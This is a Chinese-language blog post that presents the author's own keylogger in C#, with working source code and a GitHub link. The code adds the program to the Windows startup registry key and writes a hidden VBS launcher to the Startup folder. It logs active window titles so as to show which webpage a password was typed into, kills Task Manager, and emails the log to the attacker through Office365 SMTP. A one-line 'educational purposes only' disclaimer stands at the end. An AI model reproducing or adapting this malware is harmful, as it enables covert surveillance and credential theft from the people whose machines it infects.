<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="Tom-Keylogger前言 本keylogger是在 Email-keylogger基础上进行的二次开发。  新增加的功能有  win10,win7系统下实现开机自启动 实时记录当前用户开启的程序和窗口文字  若有什么不足之处，还请提出建议，附上这个 APP 的 Github 地址 Tom-Keylogger 欢迎大家  :heart: star 和 fork. 本文的主要内容 窗口句柄记录，">
<meta property="og:type" content="article">
<meta property="og:title" content="Keylogger(键盘记录器)">
<meta property="og:url" content="http://yoursite.com/2018/10/05/Keylogger-键盘记录器/index.html">
<meta property="og:site_name" content="Tom Ridder&#39;s Blog">
<meta property="og:description" content="Tom-Keylogger前言 本keylogger是在 Email-keylogger基础上进行的二次开发。  新增加的功能有  win10,win7系统下实现开机自启动 实时记录当前用户开启的程序和窗口文字  若有什么不足之处，还请提出建议，附上这个 APP 的 Github 地址 Tom-Keylogger 欢迎大家  :heart: star 和 fork. 本文的主要内容 窗口句柄记录，">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2018-10-04T18:34:17.021Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Keylogger(键盘记录器)">
<meta name="twitter:description" content="Tom-Keylogger前言 本keylogger是在 Email-keylogger基础上进行的二次开发。  新增加的功能有  win10,win7系统下实现开机自启动 实时记录当前用户开启的程序和窗口文字  若有什么不足之处，还请提出建议，附上这个 APP 的 Github 地址 Tom-Keylogger 欢迎大家  :heart: star 和 fork. 本文的主要内容 窗口句柄记录，">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/10/05/Keylogger-键盘记录器/"/>





  <title>Keylogger(键盘记录器) | Tom Ridder's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Tom Ridder's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/10/05/Keylogger-键盘记录器/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tom Ridder's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Keylogger(键盘记录器)</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-10-05T02:26:53+08:00">
                2018-10-05
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Tom-Keylogger"><a href="#Tom-Keylogger" class="headerlink" title="Tom-Keylogger"></a>Tom-Keylogger</h1><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><blockquote>
<p>本keylogger是在 <a href="https://www.go4expert.com/forums/keylogger-email-usb-spread-written-c-t23227/" target="_blank" rel="noopener">Email-keylogger</a>基础上进行的二次开发。</p>
</blockquote>
<p>新增加的功能有</p>
<ul>
<li>win10,win7系统下实现开机自启动</li>
<li>实时记录当前用户开启的程序和窗口文字</li>
</ul>
<p>若有什么不足之处，还请提出建议，附上这个 APP 的 Github 地址 <a href="https://github.com/tomridder/kl2" target="_blank" rel="noopener">Tom-Keylogger</a> 欢迎大家  :heart: star 和 fork.</p>
<h4 id="本文的主要内容"><a href="#本文的主要内容" class="headerlink" title="本文的主要内容"></a>本文的主要内容</h4><ul>
<li>窗口句柄记录，按键记录,email效果演示</li>
<li>win10,win7系统下实现开机自启动实现</li>
<li>实时记录当前用户开启的程序和窗口文字</li>
<li>如何成功实现发送txt文件到邮箱</li>
</ul>
<h4 id="1-窗口句柄记录，按键记录-效果演示："><a href="#1-窗口句柄记录，按键记录-效果演示：" class="headerlink" title="1.窗口句柄记录，按键记录 效果演示："></a>1.窗口句柄记录，按键记录 效果演示：</h4><h4 id="2-email记录效果演示"><a href="#2-email记录效果演示" class="headerlink" title="2.email记录效果演示"></a>2.email记录效果演示</h4><h4 id="3-win10-win7系统下实现开机启动实现："><a href="#3-win10-win7系统下实现开机启动实现：" class="headerlink" title="3. win10,win7系统下实现开机启动实现："></a>3. win10,win7系统下实现开机启动实现：</h4><p><strong>(1)win7下实现开机启动</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public static void Start()</span><br><span class="line">&#123;</span><br><span class="line">    //    MessageBox.Show(&quot;设置开机自启动，需要修改注册表&quot;, &quot;提示&quot;);</span><br><span class="line"></span><br><span class="line">    string path = Application.ExecutablePath;</span><br><span class="line">    RegistryKey rk = Registry.LocalMachine;//读取 Windows 注册表基项 HKEY_LOCAL_MACHINE</span><br><span class="line">    RegistryKey rk2 = rk.CreateSubKey(@&quot;Software\Microsoft\Windows\CurrentVersion\Run&quot;);</span><br><span class="line">    rk2.SetValue(&quot;JcShutdown&quot;, path);// exe 加入开机启动：）</span><br><span class="line">    rk2.Close();</span><br><span class="line">    //MessageBox.Show(&quot;Added To Started Up Successfully :) &quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>代码很简单，只是将启动的项目名称、文件位置添加到启动项即可，在win7下成功实现。win10下打开任务管理器中的启动项目可以发现该程序，但是开机后程序并没有<br>运行，这就牵扯到了第二种方法。</li>
</ul>
<p><strong>(2)win10下实现开机启动</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">public static void startup()</span><br><span class="line">&#123;</span><br><span class="line">    //Try to copy keylogger in some folders</span><br><span class="line">    string source = Application.ExecutablePath.ToString();//当前可执行文件的路径</span><br><span class="line">    Console.WriteLine(source);</span><br><span class="line">    string destination = Environment.GetFolderPath(Environment.SpecialFolder.Startup);//开机启动区 路径</span><br><span class="line">    Console.WriteLine(destination);</span><br><span class="line">    destination = System.IO.Path.Combine(destination, &quot;kl2.exe&quot;);// 将两个路径合二为一</span><br><span class="line">    try</span><br><span class="line">    &#123;</span><br><span class="line">        System.IO.File.Copy(source, destination, true);// 把当前文件 复制到 开机启动区去</span><br><span class="line">        source = destination;</span><br><span class="line">    &#125;</span><br><span class="line">    catch</span><br><span class="line">    &#123;</span><br><span class="line">        Console.WriteLine(&quot;No authorization to copy file or other error.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>首先我写了一个startup()函数用于将当前的exe文件拷贝到StartUP文件夹</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">public static void CopyVbs()</span><br><span class="line">&#123;</span><br><span class="line">    </span><br><span class="line">    string destination1 = Environment.GetFolderPath(Environment.SpecialFolder.Startup);</span><br><span class="line">    string destination = System.IO.Path.Combine(destination1, &quot;AutoStart.vbs&quot;);</span><br><span class="line">    if (!System.IO.File.Exists(destination))</span><br><span class="line">    &#123;</span><br><span class="line">        StreamWriter sw = new StreamWriter(destination);</span><br><span class="line">        sw.WriteLine(&quot;Set shell =Wscript.createobject(\&quot;WScript.Shell\&quot;)  &quot;);</span><br><span class="line">        sw.WriteLine(&quot;shell.Run \&quot;kl2.exe\&quot;,0,False&quot;);</span><br><span class="line">        sw.Close();</span><br><span class="line">        File.SetAttributes(destination, File.GetAttributes(destination) | FileAttributes.Hidden);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li><p>接着我写了一个函数，用于在StartUp文件夹下新建一个vbs文件，然后用StreamWriter 使得该vbs的内容为运行kl.exe</p>
</li>
<li><p>这样，当开机时，系统会自动运行脚本，脚本的内容为运行kl.exe。（仅仅将kl.exe拷贝到StartUp文件夹是无法开机自启动的，本人亲自试过）</p>
</li>
</ul>
<h4 id="3-实时记录当前用户开启的程序和窗口文字的实现："><a href="#3-实时记录当前用户开启的程序和窗口文字的实现：" class="headerlink" title="3.实时记录当前用户开启的程序和窗口文字的实现："></a>3.实时记录当前用户开启的程序和窗口文字的实现：</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">public static void GetActiveWindowTitle(object source, EventArgs e)</span><br><span class="line">        &#123;</span><br><span class="line">            const int nChars = 256;     </span><br><span class="line">            handle = GetForegroundWindow();</span><br><span class="line">            StringBuilder Buff = new StringBuilder(nChars);</span><br><span class="line">            GetWindowText(handle, Buff, nChars);          </span><br><span class="line">            txt = Buff.ToString().ToCharArray();</span><br><span class="line">            string t = DateTime.Now.ToString(&quot;yyyy-MM-dd H:mm:ss&quot;);</span><br><span class="line">            if (!IsFileInUse(path))</span><br><span class="line">            &#123;</span><br><span class="line">               // if (handle != handle1)</span><br><span class="line">                if(!CheckChar(txt1,txt))</span><br><span class="line">                &#123;</span><br><span class="line">                    StreamWriter ww = File.AppendText(Program.path);</span><br><span class="line">                    ww.Write(&quot;\n&quot;);</span><br><span class="line">                    ww.Write(t);</span><br><span class="line">                    ww.Write(&quot; &quot;);</span><br><span class="line">                    ww.WriteLine(Buff.ToString().ToCharArray());</span><br><span class="line">                    ww.Close();</span><br><span class="line">                   // handle1 = handle;</span><br><span class="line">                    GiveChar(txt1,txt);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">``` </span><br><span class="line">算法大概是这样的</span><br><span class="line"></span><br><span class="line">1.用GetForegroundWindow函数 得到当前运行在 最前排的程序的句柄handle</span><br><span class="line"></span><br><span class="line">2.通过GetWindowText函数将handle转换为StringBuilder</span><br><span class="line"></span><br><span class="line">3.然后将StringBuilder转换为CharArray</span><br><span class="line"></span><br><span class="line">4.接着我写了一个CheckChar函数，用于防止句柄重复写入。代码如下</span><br><span class="line"></span><br><span class="line">``` </span><br><span class="line"> public static bool CheckChar(char[] a, char[] b)</span><br><span class="line">&#123;</span><br><span class="line">    int m = Math.Min(a.Length, b.Length);</span><br><span class="line">	for (int i = 0; i &lt; m; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		if (a[i] != b[i])</span><br><span class="line">		&#123;</span><br><span class="line">			return false;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	return true;</span><br><span class="line">&#125;</span><br><span class="line">```  </span><br><span class="line">5.最后则是将CharArray写入文件，将CharArray赋值，用于下次对比。</span><br><span class="line"></span><br><span class="line">（网上的其他方法是直接对比handle来防止重复写入，这种方法是不可取的。如：当在Google Chrome中切换标签时，句柄并未发生变化，CharArray发生了变化</span><br><span class="line">，这时程序就无法正确监控用户是在哪个网页输入了密码。这算是我在做这个功能时遇到的一个很大的坑吧~~）</span><br><span class="line"></span><br><span class="line">#### 4.如何成功实现发送txt文件到邮箱</span><br><span class="line"></span><br><span class="line">C#作为高级语言真的很方便实现网络编程，直接用微软封装好的 System.Net.Mail 就足够了</span><br><span class="line"></span><br><span class="line">代码如下</span><br></pre></td></tr></table></figure>
<pre><code>public static void OnTimedEvent(object source, EventArgs e)
{

    Process[] ProcessList = Process.GetProcesses();//为每个进程资源 创建组件
    foreach (Process proc in ProcessList)
    {
        if (proc.MainWindowTitle.Contains(&quot;Taskmgr.exe&quot;))
        {
            proc.Kill();//关闭任务管理器
        }
    }
    //发送邮件
    System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
    msg.To.Add(&quot;**************&quot;);
    msg.From = new MailAddress(&quot;***********&quot;, &quot;********&quot;, System.Text.Encoding.UTF8);
    string _ComputName = System.Net.Dns.GetHostName();
    msg.Subject = _ComputName;
    msg.SubjectEncoding = System.Text.Encoding.UTF8;
    msg.Body = &quot;L&quot;;
    msg.BodyEncoding = System.Text.Encoding.UTF8;
    msg.IsBodyHtml = false;
    msg.Priority = MailPriority.High;//邮件优先级 最高
    SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
    client.Credentials = new System.Net.NetworkCredential(&quot;**********@hotmail.com&quot;, &quot;************&quot;);
    client.Port = 587;
    client.Host = &quot;smtp.office365.com&quot;;
    client.EnableSsl = true;
    Attachment data = new Attachment(Program.path);
    msg.Attachments.Add(data);//添加 附件
    try
    {
        client.Send(msg);
        failed = 0;
    }
    catch
    {
        data.Dispose();//释放掉 资源 
        failed = 1;
    }
    data.Dispose();

    //if (failed == 0)
      //  File.WriteAllText(Program.path, &quot;&quot;); //如果发送成功 则 将txt清空  防止发送相同数据

    failed = 0;
}
</code></pre><p><code>`</code></p>
<ul>
<li>你只需要将代码中的<strong>**</strong>  替换为自己的账号密码即可</li>
<li>需要注意的是，源程序中采用的smtp协议是gmail，本人亲测后发现由于网络原因无法实现按周期发送。</li>
<li>多次尝试后，发现只有hotmail可以满足成功实现。但是发件箱和收件箱必须同时开启smtp和pop3协议。</li>
</ul>
<h3 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h3><blockquote>
</blockquote>
<p>以上便是我写这个 APP 的具体实现思路，以及踩过的一些坑，记录下来，给大家看看。</p>
<h4 id="This-tutorial-is-for-educational-purposes-only-please-do-not-use-this-for-malicious-purposes"><a href="#This-tutorial-is-for-educational-purposes-only-please-do-not-use-this-for-malicious-purposes" class="headerlink" title="This tutorial is for educational purposes only, please do not use this for malicious purposes."></a>This tutorial is for educational purposes only, please do not use this for malicious purposes.</h4><p>最后附上这个 APP 的 Github 地址  <a href="https://github.com/tomridder/kl2" target="_blank" rel="noopener">Tom-Keylogger</a> 欢迎大家 star 和 fork。</p>
<p>如果有什么想法或者建议，非常欢迎大家来讨论。</p>
<hr>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/25/Into-The-Wild-荒野生存/" rel="next" title="Into The Wild(荒野生存)">
                <i class="fa fa-chevron-left"></i> Into The Wild(荒野生存)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Tom-Keylogger"><span class="nav-number">1.</span> <span class="nav-text">Tom-Keylogger</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.0.1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#本文的主要内容"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">本文的主要内容</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-窗口句柄记录，按键记录-效果演示："><span class="nav-number">1.0.1.2.</span> <span class="nav-text">1.窗口句柄记录，按键记录 效果演示：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-email记录效果演示"><span class="nav-number">1.0.1.3.</span> <span class="nav-text">2.email记录效果演示</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-win10-win7系统下实现开机启动实现："><span class="nav-number">1.0.1.4.</span> <span class="nav-text">3. win10,win7系统下实现开机启动实现：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-实时记录当前用户开启的程序和窗口文字的实现："><span class="nav-number">1.0.1.5.</span> <span class="nav-text">3.实时记录当前用户开启的程序和窗口文字的实现：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#结语"><span class="nav-number">1.0.2.</span> <span class="nav-text">结语</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#This-tutorial-is-for-educational-purposes-only-please-do-not-use-this-for-malicious-purposes"><span class="nav-number">1.0.2.1.</span> <span class="nav-text">This tutorial is for educational purposes only, please do not use this for malicious purposes.</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
